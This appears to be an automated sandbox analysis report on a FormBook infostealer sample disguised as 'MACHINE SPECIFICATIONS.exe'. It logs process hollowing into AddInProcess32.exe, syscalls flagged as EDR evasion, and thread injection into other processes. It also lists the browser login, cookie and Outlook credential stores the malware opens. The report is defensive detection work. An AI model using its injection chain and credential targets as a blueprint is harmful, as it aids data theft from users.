Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0151F42F mov eax, dword ptr fs:[00000030h]	1_2_0151F42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0151F42F mov eax, dword ptr fs:[00000030h]	1_2_0151F42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0151F42F mov eax, dword ptr fs:[00000030h]	1_2_0151F42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0151F42F mov eax, dword ptr fs:[00000030h]	1_2_0151F42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0151F42F mov eax, dword ptr fs:[00000030h]	1_2_0151F42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B14C9 mov eax, dword ptr fs:[00000030h]	1_2_014B14C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B14C9 mov eax, dword ptr fs:[00000030h]	1_2_014B14C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B14C9 mov eax, dword ptr fs:[00000030h]	1_2_014B14C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B14C9 mov eax, dword ptr fs:[00000030h]	1_2_014B14C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B14C9 mov eax, dword ptr fs:[00000030h]	1_2_014B14C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B44D1 mov eax, dword ptr fs:[00000030h]	1_2_014B44D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B44D1 mov eax, dword ptr fs:[00000030h]	1_2_014B44D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BF4D0 mov eax, dword ptr fs:[00000030h]	1_2_014BF4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BF4D0 mov eax, dword ptr fs:[00000030h]	1_2_014BF4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BF4D0 mov eax, dword ptr fs:[00000030h]	1_2_014BF4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BF4D0 mov eax, dword ptr fs:[00000030h]	1_2_014BF4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BF4D0 mov eax, dword ptr fs:[00000030h]	1_2_014BF4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BF4D0 mov eax, dword ptr fs:[00000030h]	1_2_014BF4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BF4D0 mov eax, dword ptr fs:[00000030h]	1_2_014BF4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BF4D0 mov eax, dword ptr fs:[00000030h]	1_2_014BF4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BF4D0 mov eax, dword ptr fs:[00000030h]	1_2_014BF4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CE4EF mov eax, dword ptr fs:[00000030h]	1_2_014CE4EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CE4EF mov eax, dword ptr fs:[00000030h]	1_2_014CE4EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0154F4FD mov eax, dword ptr fs:[00000030h]	1_2_0154F4FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C54E0 mov eax, dword ptr fs:[00000030h]	1_2_014C54E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B94FA mov eax, dword ptr fs:[00000030h]	1_2_014B94FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014964F0 mov eax, dword ptr fs:[00000030h]	1_2_014964F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CA4F0 mov eax, dword ptr fs:[00000030h]	1_2_014CA4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CA4F0 mov eax, dword ptr fs:[00000030h]	1_2_014CA4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0151C490 mov eax, dword ptr fs:[00000030h]	1_2_0151C490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C648A mov eax, dword ptr fs:[00000030h]	1_2_014C648A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C648A mov eax, dword ptr fs:[00000030h]	1_2_014C648A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C648A mov eax, dword ptr fs:[00000030h]	1_2_014C648A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01490485 mov ecx, dword ptr fs:[00000030h]	1_2_01490485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CB490 mov eax, dword ptr fs:[00000030h]	1_2_014CB490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CB490 mov eax, dword ptr fs:[00000030h]	1_2_014CB490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C44A8 mov eax, dword ptr fs:[00000030h]	1_2_014C44A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014924A2 mov eax, dword ptr fs:[00000030h]	1_2_014924A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014924A2 mov ecx, dword ptr fs:[00000030h]	1_2_014924A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CE4BC mov eax, dword ptr fs:[00000030h]	1_2_014CE4BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0151D4A0 mov ecx, dword ptr fs:[00000030h]	1_2_0151D4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0151D4A0 mov eax, dword ptr fs:[00000030h]	1_2_0151D4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0151D4A0 mov eax, dword ptr fs:[00000030h]	1_2_0151D4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0153E750 mov eax, dword ptr fs:[00000030h]	1_2_0153E750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C174A mov eax, dword ptr fs:[00000030h]	1_2_014C174A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C3740 mov eax, dword ptr fs:[00000030h]	1_2_014C3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F75B mov eax, dword ptr fs:[00000030h]	1_2_0148F75B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F75B mov eax, dword ptr fs:[00000030h]	1_2_0148F75B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F75B mov eax, dword ptr fs:[00000030h]	1_2_0148F75B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F75B mov eax, dword ptr fs:[00000030h]	1_2_0148F75B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F75B mov eax, dword ptr fs:[00000030h]	1_2_0148F75B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F75B mov eax, dword ptr fs:[00000030h]	1_2_0148F75B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F75B mov eax, dword ptr fs:[00000030h]	1_2_0148F75B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F75B mov eax, dword ptr fs:[00000030h]	1_2_0148F75B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F75B mov eax, dword ptr fs:[00000030h]	1_2_0148F75B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CA750 mov eax, dword ptr fs:[00000030h]	1_2_014CA750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B2755 mov eax, dword ptr fs:[00000030h]	1_2_014B2755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B2755 mov eax, dword ptr fs:[00000030h]	1_2_014B2755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B2755 mov eax, dword ptr fs:[00000030h]	1_2_014B2755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B2755 mov ecx, dword ptr fs:[00000030h]	1_2_014B2755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B2755 mov eax, dword ptr fs:[00000030h]	1_2_014B2755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B2755 mov eax, dword ptr fs:[00000030h]	1_2_014B2755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A2760 mov ecx, dword ptr fs:[00000030h]	1_2_014A2760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D1763 mov eax, dword ptr fs:[00000030h]	1_2_014D1763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D1763 mov eax, dword ptr fs:[00000030h]	1_2_014D1763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D1763 mov eax, dword ptr fs:[00000030h]	1_2_014D1763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D1763 mov eax, dword ptr fs:[00000030h]	1_2_014D1763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D1763 mov eax, dword ptr fs:[00000030h]	1_2_014D1763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D1763 mov eax, dword ptr fs:[00000030h]	1_2_014D1763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01494779 mov eax, dword ptr fs:[00000030h]	1_2_01494779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01494779 mov eax, dword ptr fs:[00000030h]	1_2_01494779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C0774 mov eax, dword ptr fs:[00000030h]	1_2_014C0774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0154F717 mov eax, dword ptr fs:[00000030h]	1_2_0154F717
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B270D mov eax, dword ptr fs:[00000030h]	1_2_014B270D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B270D mov eax, dword ptr fs:[00000030h]	1_2_014B270D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B270D mov eax, dword ptr fs:[00000030h]	1_2_014B270D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149D700 mov ecx, dword ptr fs:[00000030h]	1_2_0149D700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148B705 mov eax, dword ptr fs:[00000030h]	1_2_0148B705
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148B705 mov eax, dword ptr fs:[00000030h]	1_2_0148B705
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148B705 mov eax, dword ptr fs:[00000030h]	1_2_0148B705
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148B705 mov eax, dword ptr fs:[00000030h]	1_2_0148B705
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149471B mov eax, dword ptr fs:[00000030h]	1_2_0149471B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149471B mov eax, dword ptr fs:[00000030h]	1_2_0149471B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155970B mov eax, dword ptr fs:[00000030h]	1_2_0155970B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155970B mov eax, dword ptr fs:[00000030h]	1_2_0155970B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B9723 mov eax, dword ptr fs:[00000030h]	1_2_014B9723
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0154F7CF mov eax, dword ptr fs:[00000030h]	1_2_0154F7CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BE7E0 mov eax, dword ptr fs:[00000030h]	1_2_014BE7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014937E4 mov eax, dword ptr fs:[00000030h]	1_2_014937E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014937E4 mov eax, dword ptr fs:[00000030h]	1_2_014937E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014937E4 mov eax, dword ptr fs:[00000030h]	1_2_014937E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014937E4 mov eax, dword ptr fs:[00000030h]	1_2_014937E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014937E4 mov eax, dword ptr fs:[00000030h]	1_2_014937E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014937E4 mov eax, dword ptr fs:[00000030h]	1_2_014937E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014937E4 mov eax, dword ptr fs:[00000030h]	1_2_014937E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014977F9 mov eax, dword ptr fs:[00000030h]	1_2_014977F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014977F9 mov eax, dword ptr fs:[00000030h]	1_2_014977F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0150E79D mov eax, dword ptr fs:[00000030h]	1_2_0150E79D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0150E79D mov eax, dword ptr fs:[00000030h]	1_2_0150E79D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0150E79D mov eax, dword ptr fs:[00000030h]	1_2_0150E79D

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Code function: 0_2_00007FF6D38BFDD0 GetProcessHeap,

0_2_00007FF6D38BFDD0

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00007FF6D38B63C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6D38B63C0
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00007FF6D38BB3D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6D38BB3D8
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00007FF6D38B65D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6D38B65D8
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00007FF6D38B6568 SetUnhandledExceptionFilter,	0_2_00007FF6D38B6568

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	NtWriteVirtualMemory: Indirect: 0x7FF6D38B470D	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x866614	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtResumeThread: Direct from: 0x68F0606	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	NtClose: Indirect: 0x133F504
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	NtWriteVirtualMemory: Indirect: 0x7FF6D38B42C8	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x85F4B5	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x68F812F	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtClose: Direct from: 0x8666B2
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x85E662	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x85D215	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x867AA4	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x866421	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x7FFDB1942651	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	NtSuspendThread: Indirect: 0x1343950	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x85F471	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtQuerySystemInformation: Direct from: 0x8664BD	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtClose: Direct from: 0x7FFD7BB99E7F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x68F03D4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	NtQueueApcThread: Indirect: 0x133F47F	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x86656C	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	NtAllocateVirtualMemory: Indirect: 0x7FF6D38B40B0	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	NtWriteVirtualMemory: Indirect: 0x7FF6D38B415A	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	NtResumeThread: Indirect: 0x1343C60	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtCreateThreadEx: Direct from: 0x85DA5F	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x85F386	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x85F442	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x68F0595	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	NtResumeThread: Indirect: 0x7FF6D38B4882	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtQueryInformationToken: Direct from: 0x85EDBF	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	NtSetContextThread: Indirect: 0x1343640	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread register set: target process: 5320	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Thread register set: target process: 5320	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Thread register set: target process: 9172	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: AB8008	Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: RAVCpl64.exe, 00000003.00000002.111785053907.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.107216150826.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RAVCpl64.exe, 00000003.00000002.111785053907.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.107216150826.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: RAVCpl64.exe, 00000003.00000002.111785053907.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.107216150826.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: RAVCpl64.exe, 00000003.00000002.111785053907.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.107216150826.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager\FB;

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Code function: 0_2_00007FF6D38C47B0 cpuid

0_2_00007FF6D38C47B0

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Code function: 0_2_00007FF6D38B6754 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF6D38B6754

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.110844567942.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.107285059805.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.110844494408.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\cmdkey.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\cmdkey.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.110844567942.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.107285059805.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
